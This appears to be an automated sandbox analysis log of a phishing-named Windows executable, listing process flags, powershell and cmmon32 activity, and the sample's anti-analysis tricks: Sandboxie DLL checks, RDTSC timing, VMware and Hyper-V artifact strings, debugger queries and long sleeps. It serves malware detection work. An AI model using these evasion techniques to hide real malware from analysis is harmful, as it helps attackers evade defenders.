Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmmon32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmmon32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmmon32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmmon32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmmon32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.314738221.0000000002951000.00000004.00000001.sdmp

Binary or memory string: SBIEDLL.DLLDSELECT * FROM WIN32_COMPUTERSYSTEM

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe	RDTSC instruction interceptor: First address: 0000000002B198E4 second address: 0000000002B198EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe	RDTSC instruction interceptor: First address: 0000000002B19B5E second address: 0000000002B19B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe

Code function: 24_2_00409A90 rdtsc

Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4734
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2204

Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe TID: 5512	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6320	Thread sleep count: 4734 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6320	Thread sleep count: 2204 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2596	Thread sleep count: 51 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6920	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmmon32.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: powershell.exe, 00000016.00000003.399487030.000000000599A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V
Source: explorer.exe, 00000019.00000000.348253683.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000019.00000000.348253683.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000019.00000000.346788619.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000019.00000000.347525561.0000000008640000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.314738221.0000000002951000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: explorer.exe, 00000019.00000000.335019320.00000000055D0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: explorer.exe, 00000019.00000000.348253683.000000000871F000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000019.00000000.348253683.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000019.00000000.348546302.00000000087D1000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00ices
Source: explorer.exe, 00000019.00000000.335150903.0000000005603000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000019.00000000.349143933.00000000088C3000.00000004.00000001.sdmp	Binary or memory string: en_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000019.00000000.346788619.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000019.00000000.346788619.0000000008220000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: AdvancedRun.exe, 00000009.00000002.283016558.0000000000757000.00000004.00000020.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000016.00000003.399487030.000000000599A000.00000004.00000001.sdmp	Binary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: explorer.exe, 00000019.00000000.346788619.0000000008220000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe

Process information queried: ProcessInformation

Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\cmmon32.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe

Code function: 24_2_00409A90 rdtsc

Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe

Code function: 24_2_0040ACD0 LdrLoadDll,

Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe

Code function: 9_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01214120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01214120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01214120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01214120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01214120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0122513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0122513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_011F9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_011F9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_011F9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0121B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0121B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_011FB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_011FB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_011FC962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012769A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012261A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012261A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012B49A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012B49A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012B49A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012B49A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012751BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012751BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012751BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012751BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0121C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0122A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01222990 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012841E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_011FB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_011FB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_011FB1E1 mov eax, dword ptr fs:[00000030h]
